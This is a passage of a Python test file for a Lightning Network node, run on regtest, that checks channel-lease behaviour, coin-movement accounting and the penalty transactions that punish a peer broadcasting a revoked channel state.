    l2.daemon.logsearch_start = needle
    l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
                                   'THEIR_REVOKED_UNILATERAL/OUR_HTLC')

    l2.daemon.logsearch_start = needle
    l2.daemon.wait_for_log('Ignoring output.*: THEIR_REVOKED_UNILATERAL/OUTPUT_TO_US')

    # FIXME: test HTLC tx race!

    # 100 blocks later, all resolved.
    bitcoind.generate_block(100)

    sync_blockheight(bitcoind, [l1, l2])
    wait_for(lambda: len(l2.rpc.listpeers()['peers']) == 0)

    # Do one last pass over the logs to extract the reactions l2 sent
    l2.daemon.logsearch_start = needle
    needles = [
        r'Resolved FUNDING_TRANSACTION/FUNDING_OUTPUT by THEIR_REVOKED_UNILATERAL .([a-f0-9]{64}).',
        r'Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by our proposal OUR_PENALTY_TX .([a-f0-9]{64}).',
        r'Resolved THEIR_REVOKED_UNILATERAL/OUR_HTLC by our proposal OUR_PENALTY_TX .([a-f0-9]{64}).',
    ]
    matches = list(map(l2.daemon.is_in_log, needles))

    # Now extract the txids for these responses
    txids = set([re.search(r'\(([0-9a-f]{64})\)', m).group(1) for m in matches])

    # We should have one confirmed output for each of the above reactions in
    # the list of funds we own.
    outputs = l2.rpc.listfunds()['outputs']
    assert [o['status'] for o in outputs] == ['confirmed'] * 3
    assert set([o['txid'] for o in outputs]) == txids

    assert account_balance(l1, channel_id) == 0
    assert account_balance(l2, channel_id) == 0

    # l1 loses all of their channel balance to the peer, as penalties
    expected_1 = {
        '0': [('wallet', ['deposit'], ['withdrawal'], 'A')],
        'A': [('wallet', ['deposit'], None, None), ('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
        'B': [('external', ['penalty'], None, None), ('external', ['penalty'], None, None), ('external', ['penalty'], None, None)],
    }

    # l2 sweeps all of l1's closing outputs
    expected_2 = {
        'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
        'B': [('wallet', ['deposit'], None, None), ('cid1', ['penalty'], ['to_wallet'], 'C'), ('cid1', ['penalty'], ['to_wallet'], 'D')],
        'C': [('wallet', ['deposit'], None, None)],
        'D': [('wallet', ['deposit'], None, None)]
    }

    if anchor_expected():
        expected_1['B'].append(('external', ['anchor'], None, None))
        expected_2['B'].append(('external', ['anchor'], None, None))
        expected_1['B'].append(('wallet', ['anchor'], None, None))
        expected_2['B'].append(('wallet', ['anchor'], None, None))

    # We use a subset of tags in expected_2 that are used in expected_1
    tags = check_utxos_channel(l1, [channel_id], expected_1)
    check_utxos_channel(l2, [channel_id], expected_2, tags)
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@pytest.mark.slow_test
@pytest.mark.developer("requres 'dev-queryrates'")
def test_channel_lease_falls_behind(node_factory, bitcoind):
    '''
    If our peer falls too far behind/doesn't send us an update for
    their blockheight, the lessor fails the channel
    '''
    # Both nodes advertise identical liquidity-ad (lease) terms.
    opts = [{'funder-policy': 'match', 'funder-policy-mod': 100,
             'lease-fee-base-sat': '100sat', 'lease-fee-basis': 100},
            {'funder-policy': 'match', 'funder-policy-mod': 100,
             'lease-fee-base-sat': '100sat', 'lease-fee-basis': 100}]
    l1, l2, = node_factory.get_nodes(2, opts=opts)
    amount = 500000  # sats requested from (and matched by) the lessor
    feerate = 2000   # perkw feerate used for the funding tx
    l1.fundwallet(20000000)
    l2.fundwallet(20000000)
    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    # dev_queryrates disconnects the peer after fetching lease rates,
    # so wait for the peer entry to disappear before reconnecting.
    rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
    wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    # l1 leases a channel from l2
    l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
                       feerate='{}perkw'.format(feerate),
                       compact_lease=rates['compact_lease'])
    # sink the funding transaction
    bitcoind.generate_block(1, wait_for_mempool=1)
    # stop l1
    l1.stop()
    # advance blockchain 1008 blocks, the lessor should drop to chain
    bitcoind.generate_block(1008)
    sync_blockheight(bitcoind, [l2])
    # l2 (the lessor) gives up on the silent leaseholder.
    l2.daemon.wait_for_log('Offline peer is too far behind, terminating')
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@pytest.mark.developer("requres 'dev-queryrates'")
@pytest.mark.slow_test
def test_channel_lease_post_expiry(node_factory, bitcoind, chainparams):
    """Lease a channel, let the lease expire, then mutual-close.

    Verifies that the lessor cannot close while the lease is active, that
    blockheight updates keep flowing while the chain advances past the
    lease term, and that the final coin movements account for the lease
    fee exactly on both sides.
    """
    coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
    opts = {'funder-policy': 'match', 'funder-policy-mod': 100,
            'lease-fee-base-sat': '100sat', 'lease-fee-basis': 100,
            'may_reconnect': True, 'plugin': coin_mvt_plugin}
    l1, l2, = node_factory.get_nodes(2, opts=opts)
    feerate = 2000
    amount = 500000
    l1.fundwallet(20000000)
    l2.fundwallet(20000000)
    # l1 leases a channel from l2
    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    # dev_queryrates disconnects after the rate lookup; wait, then reconnect.
    rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
    wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
                       feerate='{}perkw'.format(feerate),
                       compact_lease=rates['compact_lease'])
    est_fees = calc_lease_fee(amount, feerate, rates)
    # This should be the accepter's amount
    fundings = only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['funding']
    assert Millisatoshi(est_fees + amount * 1000) == Millisatoshi(fundings['remote_msat'])
    bitcoind.generate_block(6)
    l1.daemon.wait_for_log('to CHANNELD_NORMAL')
    channel_id = first_channel_id(l1, l2)
    wait_for(lambda: [c['active'] for c in l1.rpc.listchannels(l1.get_channel_scid(l2))['channels']] == [True, True])
    # send some payments, mine a block or two
    inv = l2.rpc.invoice(10**4, '1', 'no_1')
    l1.rpc.pay(inv['bolt11'])
    # l2 attempts to close a channel that it leased, should fail
    with pytest.raises(RpcError, match=r'Peer leased this channel from us'):
        l2.rpc.close(l1.get_channel_scid(l2))
    bitcoind.generate_block(6)
    sync_blockheight(bitcoind, [l1, l2])
    # make sure we're at the right place for the csv lock
    l2.daemon.wait_for_log('Blockheight: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION LOCAL now 115')
    # We need to give l1-l2 time to update their blockheights
    # (advance past the lease in chunks, checking the leaseholder keeps
    # sending WIRE_UPDATE_BLOCKHEIGHT after each chunk)
    bitcoind.generate_block(1000)
    sync_blockheight(bitcoind, [l1, l2])
    l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
    bitcoind.generate_block(1000)
    sync_blockheight(bitcoind, [l1, l2])
    l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
    bitcoind.generate_block(1000)
    sync_blockheight(bitcoind, [l1, l2])
    l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
    bitcoind.generate_block(1000)
    sync_blockheight(bitcoind, [l1, l2])
    l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
    bitcoind.generate_block(32)
    sync_blockheight(bitcoind, [l1, l2])
    l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
    # l1<->l2 mutual close should work
    chan = l1.get_channel_scid(l2)
    l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
    l1.rpc.close(chan)
    l2.daemon.wait_for_log('State changed from CLOSINGD_SIGEXCHANGE to CLOSINGD_COMPLETE')
    bitcoind.generate_block(2)
    sync_blockheight(bitcoind, [l1, l2])
    l1.daemon.wait_for_log('Resolved FUNDING_TRANSACTION/FUNDING_OUTPUT by MUTUAL_CLOSE')
    l2.daemon.wait_for_log('Resolved FUNDING_TRANSACTION/FUNDING_OUTPUT by MUTUAL_CLOSE')
    # Expected ledger for l1 (opener/lessee): pays the 6432000msat lease
    # fee plus a 10000msat invoice out of its opening balance.
    channel_mvts_1 = [
        {'type': 'chain_mvt', 'credit': 506432000, 'debit': 0, 'tags': ['channel_open', 'opener', 'leased']},
        {'type': 'channel_mvt', 'credit': 0, 'debit': 6432000, 'tags': ['lease_fee'], 'fees': '0msat'},
        {'type': 'channel_mvt', 'credit': 0, 'debit': 10000, 'tags': ['invoice'], 'fees': '0msat'},
        {'type': 'chain_mvt', 'credit': 0, 'debit': 499990000, 'tags': ['channel_close']},
    ]
    # Mirror image for l2 (lessor): earns the lease fee and the invoice.
    channel_mvts_2 = [
        {'type': 'chain_mvt', 'credit': 500000000, 'debit': 0, 'tags': ['channel_open', 'leased']},
        {'type': 'channel_mvt', 'credit': 6432000, 'debit': 0, 'tags': ['lease_fee'], 'fees': '0msat'},
        {'type': 'channel_mvt', 'credit': 10000, 'debit': 0, 'tags': ['invoice'], 'fees': '0msat'},
        {'type': 'chain_mvt', 'credit': 0, 'debit': 506442000, 'tags': ['channel_close']},
    ]
    check_coin_moves(l1, channel_id, channel_mvts_1, chainparams)
    check_coin_moves(l2, channel_id, channel_mvts_2, chainparams)
    # Channel accounts must zero out once everything settles on-chain.
    assert account_balance(l1, channel_id) == 0
    assert account_balance(l2, channel_id) == 0
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@pytest.mark.slow_test
@pytest.mark.developer("requres 'dev-queryrates'")
def test_channel_lease_unilat_closes(node_factory, bitcoind):
    '''
    Check that channel leases work

    l1-l2: l1 leases funds from l2; l1 goes to chain unilaterally
    l2-l3: l2 leases funds from l3; l3 goes to chain unilaterally
    '''
    opts = {'funder-policy': 'match', 'funder-policy-mod': 100,
            'lease-fee-base-sat': '100sat', 'lease-fee-basis': 100,
            'funder-lease-requests-only': False}
    l1, l2, l3 = node_factory.get_nodes(3, opts=opts)
    # Allow l2 some warnings
    l2.allow_warning = True
    feerate = 2000
    amount = 500000
    l1.fundwallet(20000000)
    l2.fundwallet(20000000)
    l3.fundwallet(20000000)
    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    # dev_queryrates disconnects the peer; wait for it, then reconnect.
    rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
    wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    # l1 leases a channel from l2
    l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
                       feerate='{}perkw'.format(feerate),
                       compact_lease=rates['compact_lease'])
    # l2 leases a channel from l3
    l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
    rates = l2.rpc.dev_queryrates(l3.info['id'], amount, amount)
    wait_for(lambda: len(l2.rpc.listpeers(l3.info['id'])['peers']) == 0)
    l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
    # minconf=0: l2's wallet change from the first funding is unconfirmed.
    l2.rpc.fundchannel(l3.info['id'], amount, request_amt=amount,
                       feerate='{}perkw'.format(feerate), minconf=0,
                       compact_lease=rates['compact_lease'])
    est_fees = calc_lease_fee(amount, feerate, rates)
    # This should be the accepter's amount
    fundings = only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['funding']
    assert Millisatoshi(est_fees + amount * 1000) == Millisatoshi(fundings['remote_msat'])
    bitcoind.generate_block(6)
    l1.daemon.wait_for_log('to CHANNELD_NORMAL')
    l3.daemon.wait_for_log('to CHANNELD_NORMAL')
    wait_for(lambda: [c['active'] for c in l1.rpc.listchannels(l1.get_channel_scid(l2))['channels']] == [True, True])
    wait_for(lambda: [c['active'] for c in l3.rpc.listchannels(l3.get_channel_scid(l2))['channels']] == [True, True])
    # send some payments, mine a block or two
    inv = l2.rpc.invoice(10**4, '1', 'no_1')
    l1.rpc.pay(inv['bolt11'])
    inv = l2.rpc.invoice(10**4, '3', 'no_3')
    l3.rpc.pay(inv['bolt11'])
    bitcoind.generate_block(6)
    sync_blockheight(bitcoind, [l1, l2, l3])
    # make sure we're at the right place for the csv lock
    l2.daemon.wait_for_log('Blockheight: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION LOCAL now 110')
    l2.stop()
    # unilateral close channels l1<->l2 & l3<->l2
    l1.rpc.close(l2.info['id'], 1)
    # l3 leased funds out to l2, so it must explicitly force the close.
    l3.rpc.close(l2.info['id'], 1, force_lease_closed=True)
    # Wait til to_self_delay expires, l1 should claim to_local back
    bitcoind.generate_block(10, wait_for_mempool=2)
    l1.daemon.wait_for_log('Broadcasting OUR_DELAYED_RETURN_TO_WALLET')
    bitcoind.generate_block(1, wait_for_mempool=1)
    l1.daemon.wait_for_log('Resolved OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by our proposal OUR_DELAYED_RETURN_TO_WALLET')
    assert len(l1.rpc.listfunds()['outputs']) == 2
    l2.start()
    # Rewind logsearch between greps: the two 'adding utxo' lines may
    # appear in either order in l2's log.
    search_start = l2.daemon.logsearch_start
    log = l2.daemon.wait_for_log('adding utxo to watch .* csv 40.*')
    utxo1 = re.match('.* adding utxo to watch (.*), csv .*', log).group(1)
    l2.daemon.logsearch_start = search_start
    log = l2.daemon.wait_for_log('adding utxo to watch .* csv 1')
    utxo3 = re.match('.* adding utxo to watch (.*), csv 1', log).group(1)
    # we *shouldn't* be able to spend it, there's a lock on it
    with pytest.raises(RpcError, match='UTXO .* is csv locked'):
        l2.rpc.withdraw(l2.rpc.newaddr()['bech32'], "all", utxos=[utxo1])
    # we *can* spend the 1csv lock one
    l2.rpc.withdraw(l2.rpc.newaddr()['bech32'], "all", utxos=[utxo3])
    # This can timeout, so do it in four easy stages.
    for i in range(4):
        bitcoind.generate_block(4032 // 4)
        sync_blockheight(bitcoind, [l2, l3])
    # After the full 4032-block csv lock, the leased utxo is spendable.
    l2.rpc.withdraw(l2.rpc.newaddr()['bech32'], "all", utxos=[utxo1])
    # l3 cleans up their to-self after their lease expires
    assert l3.daemon.is_in_log('Broadcasting OUR_DELAYED_RETURN_TO_WALLET')
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@unittest.skipIf(os.getenv('TEST_DB_PROVIDER', 'sqlite3') != 'sqlite3', "Makes use of the sqlite3 db")
@pytest.mark.developer("requres 'dev-queryrates'")
def test_channel_lease_lessor_cheat(node_factory, bitcoind, chainparams):
    '''
    Check that lessee can recover funds if lessor cheats
    '''
    balance_snaps = os.path.join(os.getcwd(), 'tests/plugins/balance_snaps.py')
    opts = [{'funder-policy': 'match', 'funder-policy-mod': 100,
             'lease-fee-base-sat': '100sat', 'lease-fee-basis': 100,
             'may_reconnect': True, 'allow_warning': True,
             'plugin': balance_snaps},
            {'funder-policy': 'match', 'funder-policy-mod': 100,
             'lease-fee-base-sat': '100sat', 'lease-fee-basis': 100,
             'may_reconnect': True, 'allow_broken_log': True,
             'plugin': balance_snaps}]
    l1, l2, = node_factory.get_nodes(2, opts=opts)
    amount = 500000
    feerate = 2000
    l1.fundwallet(20000000)
    l2.fundwallet(20000000)
    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    # dev_queryrates disconnects the peer; wait for it, then reconnect.
    rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
    wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    # l1 leases a channel from l2
    l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
                       feerate='{}perkw'.format(feerate),
                       compact_lease=rates['compact_lease'])
    bitcoind.generate_block(6)
    l1.daemon.wait_for_log('to CHANNELD_NORMAL')
    wait_for(lambda: [c['active'] for c in l1.rpc.listchannels(l1.get_channel_scid(l2))['channels']] == [True, True])
    wait_for(lambda: [c['active'] for c in l2.rpc.listchannels(l2.get_channel_scid(l1))['channels']] == [True, True])
    # send some payments, mine a block or two
    inv = l2.rpc.invoice(10**4, '1', 'no_1')
    l1.rpc.pay(inv['bolt11'])
    bitcoind.generate_block(1)
    # make database snapshot of l2
    l2.stop()
    l2_db_path = os.path.join(l2.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3')
    l2_db_path_bak = os.path.join(l2.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3.bak')
    copyfile(l2_db_path, l2_db_path_bak)
    l2.start(wait_for_bitcoind_sync=True)
    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    sync_blockheight(bitcoind, [l2])
    # push some money from l2->l1, so the commit counter advances
    inv = l1.rpc.invoice(10**5, '2', 'no_2')
    l2.rpc.pay(inv['bolt11'])
    # stop both nodes, roll back l2's database
    l2.stop()
    l1.stop()
    copyfile(l2_db_path_bak, l2_db_path)
    # start l2 and force close channel with l1 while l1 is still offline
    # (l2 now has a revoked/stale state, i.e. it is cheating)
    l2.start()
    sync_blockheight(bitcoind, [l2])
    l2.rpc.close(l1.info['id'], 1, force_lease_closed=True)
    bitcoind.generate_block(1, wait_for_mempool=1)
    l1.start()
    sync_blockheight(bitcoind, [l1])
    # l1 detects the cheat and sweeps everything via penalty txs.
    l1.daemon.wait_for_logs(['Broadcasting OUR_PENALTY_TX',
                             ' Propose handling THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by OUR_PENALTY_TX'])
    bitcoind.generate_block(1, wait_for_mempool=1)
    # l2 sees that l1 has spent their coins!
    l2.daemon.wait_for_log('Unknown spend of OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by')
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@unittest.skipIf(os.getenv('TEST_DB_PROVIDER', 'sqlite3') != 'sqlite3', "Makes use of the sqlite3 db")
@pytest.mark.developer("requres 'dev-queryrates'")
def test_channel_lease_lessee_cheat(node_factory, bitcoind, chainparams):
    '''
    Check that lessor can recover funds if lessee cheats
    '''
    opts = [{'funder-policy': 'match', 'funder-policy-mod': 100,
             'lease-fee-base-sat': '100sat', 'lease-fee-basis': 100,
             'may_reconnect': True, 'allow_broken_log': True},
            {'funder-policy': 'match', 'funder-policy-mod': 100,
             'lease-fee-base-sat': '100sat', 'lease-fee-basis': 100,
             'may_reconnect': True}]
    l1, l2, = node_factory.get_nodes(2, opts=opts)
    amount = 500000
    feerate = 2000
    l1.fundwallet(20000000)
    l2.fundwallet(20000000)
    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    # dev_queryrates disconnects the peer; wait for it, then reconnect.
    rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
    wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    # l1 leases a channel from l2
    l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
                       feerate='{}perkw'.format(feerate),
                       compact_lease=rates['compact_lease'])
    bitcoind.generate_block(6)
    l1.daemon.wait_for_log('to CHANNELD_NORMAL')
    wait_for(lambda: [c['active'] for c in l1.rpc.listchannels(l1.get_channel_scid(l2))['channels']] == [True, True])
    wait_for(lambda: [c['active'] for c in l2.rpc.listchannels(l2.get_channel_scid(l1))['channels']] == [True, True])
    # send some payments, mine a block or two
    inv = l2.rpc.invoice(10**4, '1', 'no_1')
    l1.rpc.pay(inv['bolt11'])
    bitcoind.generate_block(1)
    # make database snapshot of l1
    l1.stop()
    l1_db_path = os.path.join(l1.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3')
    l1_db_path_bak = os.path.join(l1.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3.bak')
    copyfile(l1_db_path, l1_db_path_bak)
    l1.start()
    # BUGFIX: reconnect l1 to its *peer* l2 (was l1.info['id']/l1.port,
    # i.e. a connect-to-self), so the l2->l1 payment below can proceed
    # and advance the commit counter past the snapshot.
    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    sync_blockheight(bitcoind, [l1])
    # push some money from l2->l1, so the commit counter advances
    inv = l1.rpc.invoice(10**5, '2', 'no_2')
    l2.rpc.pay(inv['bolt11'])
    # stop both nodes, roll back l1's database
    l1.stop()
    l2.stop()
    copyfile(l1_db_path_bak, l1_db_path)
    # start l1 and force close channel with l2 while l2 is still offline
    # (l1 now has a revoked/stale state, i.e. it is cheating)
    l1.start()
    sync_blockheight(bitcoind, [l1])
    l1.rpc.close(l2.info['id'], 1, force_lease_closed=True)
    bitcoind.generate_block(1, wait_for_mempool=1)
    l2.start()
    sync_blockheight(bitcoind, [l2])
    # l2 detects the cheat and sweeps everything via penalty txs.
    l2.daemon.wait_for_logs(['Broadcasting OUR_PENALTY_TX',
                             ' Propose handling THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by OUR_PENALTY_TX'])
    bitcoind.generate_block(1, wait_for_mempool=1)
    # l1 sees that l2 has spent their coins!
    l1.daemon.wait_for_logs(['Grinding for to_remote',
                             'Unknown spend of OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by'])
@pytest.mark.developer("needs DEVELOPER=1")
@unittest.skipIf(os.getenv('TEST_DB_PROVIDER', 'sqlite3') != 'sqlite3', "Makes use of the sqlite3 db")
@pytest.mark.slow_test
def test_penalty_htlc_tx_fulfill(node_factory, bitcoind, chainparams):
    """ Test that the penalizing node claims any published
    HTLC transactions

    Node topology:
    l1 <-> l2 <-> l3 <-> l4

    l4 pushes money to l1, who doesn't fulfill (freezing htlc across l2-l3)
    we snapshot l2
    l2 pushes money to l3 (updating state)
    l2 + l3 go offline; l2 is backed up from snapshot
    l1 fails the channel with l2, fulfilling the stranded htlc onchain
    l2 comes back online, force closes channel with l3
    block chain advances, l2 broadcasts their htlc fulfill tx
    l3 comes back online, sees l2's cheat. takes funds from htlc fulfill tx.
    some blocks are mined. the dust settles.

    we check the accounting.
    """
    # We track channel balances, to verify that accounting is ok.
    coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
    balance_snaps = os.path.join(os.getcwd(), 'tests/plugins/balance_snaps.py')
    # l1 holds the fulfill; l2/l3 may log broken messages when cheated on.
    l1, l2, l3, l4 = node_factory.line_graph(4,
                                             opts=[{'disconnect': ['-WIRE_UPDATE_FULFILL_HTLC'],
                                                    'may_reconnect': True,
                                                    'dev-no-reconnect': None},
                                                   {'plugin': [coin_mvt_plugin, balance_snaps],
                                                    'disable-mpp': None,
                                                    'dev-no-reconnect': None,
                                                    'may_reconnect': True,
                                                    'allow_broken_log': True},
                                                   {'plugin': [coin_mvt_plugin, balance_snaps],
                                                    'dev-no-reconnect': None,
                                                    'may_reconnect': True,
                                                    'allow_broken_log': True},
                                                   {'dev-no-reconnect': None,
                                                    'may_reconnect': True}],
                                             wait_for_announce=True)
    channel_id = first_channel_id(l2, l3)
    # push some money so that 1 + 4 can both send htlcs
    inv = l2.rpc.invoice(10**9 // 2, '1', 'balancer')
    l1.rpc.pay(inv['bolt11'])
    l1.rpc.waitsendpay(inv['payment_hash'])
    inv = l4.rpc.invoice(10**9 // 2, '1', 'balancer')
    l2.rpc.pay(inv['bolt11'])
    l2.rpc.waitsendpay(inv['payment_hash'])
    # now we send one 'sticky' htlc: l4->l1
    # (l1's dev_disconnect drops the fulfill, so the htlc stays pending
    # across the l2-l3 hop)
    amt = 10**8 // 2
    sticky_inv = l1.rpc.invoice(amt, '2', 'sticky')
    route = l4.rpc.getroute(l1.info['id'], amt, 1)['route']
    l4.rpc.sendpay(route, sticky_inv['payment_hash'], payment_secret=sticky_inv['payment_secret'])
    l1.daemon.wait_for_log('dev_disconnect: -WIRE_UPDATE_FULFILL_HTLC')
    wait_for(lambda: len(l2.rpc.listpeers(l3.info['id'])['peers'][0]['channels'][0]['htlcs']) == 1)
    # make database snapshot of l2
    l2.stop()
    l2_db_path = os.path.join(l2.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3')
    l2_db_path_bak = os.path.join(l2.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3.bak')
    copyfile(l2_db_path, l2_db_path_bak)
    l2.start()
    sync_blockheight(bitcoind, [l2])
    # push some money from l3->l2, so that the commit counter advances
    l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
    inv = l3.rpc.invoice(10**4, '1', 'push')
    # Make sure gossipd in l2 knows it's active
    wait_for(lambda: [c['active'] for c in l2.rpc.listchannels(l2.get_channel_scid(l3))['channels']] == [True, True])
    l2.rpc.pay(inv['bolt11'])
    # stop both nodes, roll back l2's database
    l2.stop()
    l3.stop()
    copyfile(l2_db_path_bak, l2_db_path)
    # start l2 and force close channel with l3 while l3 is still offline
    # (l2 now broadcasts a revoked commitment, i.e. it is cheating)
    l2.start()
    sync_blockheight(bitcoind, [l2])
    l2.rpc.close(l3.info['id'], 1)
    l2.daemon.wait_for_log('sendrawtx exit 0')
    # reconnect with l1, which will fulfill the payment
    l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
    l2.daemon.wait_for_log('got commitsig .*: feerate 11000, blockheight: 0, 0 added, 1 fulfilled, 0 failed, 0 changed')
    # l2 moves on for closed l3
    bitcoind.generate_block(1)
    l2.daemon.wait_for_log('to ONCHAIN')
    l2.daemon.wait_for_logs(['Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks',
                             'Propose handling OUR_UNILATERAL/THEIR_HTLC by OUR_HTLC_SUCCESS_TX .* after 0 blocks'])
    l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
                                   'OUR_UNILATERAL/THEIR_HTLC')
    bitcoind.generate_block(1)
    l2.daemon.wait_for_log('Propose handling OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
    # l3 comes back up, sees cheat, penalizes l2 (revokes the htlc they've offered;
    # notes that they've successfully claimed to_local and the fulfilled htlc)
    l3.start()
    sync_blockheight(bitcoind, [l3])
    l3.daemon.wait_for_logs(['Propose handling THEIR_REVOKED_UNILATERAL/OUR_HTLC by OUR_PENALTY_TX',
                             'Propose handling THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM '
                             'by OUR_PENALTY_TX',
                             'Resolved THEIR_REVOKED_UNILATERAL/OUR_HTLC by OUR_HTLC_FULFILL_TO_THEM',
                             'Propose handling OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM'
                             ' by OUR_PENALTY_TX'])
    l3.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
                                   'OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM')
    bitcoind.generate_block(1)
    l3.daemon.wait_for_log('Resolved OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM '
                           'by our proposal OUR_PENALTY_TX')
    l2.daemon.wait_for_log('Unknown spend of OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
    # 100 blocks later, l3+l2 are both done
    bitcoind.generate_block(100)
    l3.daemon.wait_for_log('{}.*: onchaind complete, forgetting peer'.format(l2.info['id']))
    l2.daemon.wait_for_log('{}.*: onchaind complete, forgetting peer'.format(l3.info['id']))
    assert account_balance(l3, channel_id) == 0
    assert account_balance(l2, channel_id) == 0
    # Expected utxo graph for the cheater l2 (everything it tried to
    # claim ends up penalized by l3).
    expected_2 = {
        'A': [('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
        'B': [('external', ['to_them'], None, None), ('cid1', ['htlc_fulfill'], ['htlc_fulfill'], 'C'), ('external', ['penalized'], None, None)],
        'C': [('external', ['penalized'], None, None)],
    }
    # Expected utxo graph for the penalizer l3 (sweeps cheat outputs to
    # its own wallet).
    expected_3 = {
        'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
        'B': [('wallet', ['deposit'], None, None), ('external', ['htlc_fulfill'], ['htlc_fulfill'], 'C'), ('cid1', ['penalty'], ['to_wallet'], 'E')],
        'C': [('cid1', ['penalty'], ['to_wallet'], 'D')],
        'D': [('wallet', ['deposit'], None, None)],
        'E': [('wallet', ['deposit'], None, None)]
    }
    if anchor_expected():
        expected_2['B'].append(('external', ['anchor'], None, None))
        expected_3['B'].append(('external', ['anchor'], None, None))
        expected_2['B'].append(('wallet', ['anchor'], None, None))
        expected_3['B'].append(('wallet', ['anchor'], None, None))
    tags = check_utxos_channel(l2, [channel_id], expected_2, filter_channel=channel_id)
    check_utxos_channel(l3, [channel_id], expected_3, tags, filter_channel=channel_id)
    if not chainparams['elements']:
        # Also check snapshots
        expected_bals_2 = [
            {'blockheight': 101, 'accounts': [{'balance': '0msat'}]},
            {'blockheight': 108, 'accounts': [{'balance': '995433000msat'}, {'balance': '500000000msat'}, {'balance': '499994999msat'}]},
            # There's a duplicate because we stop and restart l2 twice
            # (both times at block 108)
            {'blockheight': 108, 'accounts': [{'balance': '995433000msat'}, {'balance': '500000000msat'}, {'balance': '499994999msat'}]},
        ]
        check_balance_snaps(l2, expected_bals_2)
@pytest.mark.developer("needs DEVELOPER=1")
@unittest.skipIf(os.getenv('TEST_DB_PROVIDER', 'sqlite3') != 'sqlite3', "Makes use of the sqlite3 db")
@pytest.mark.slow_test
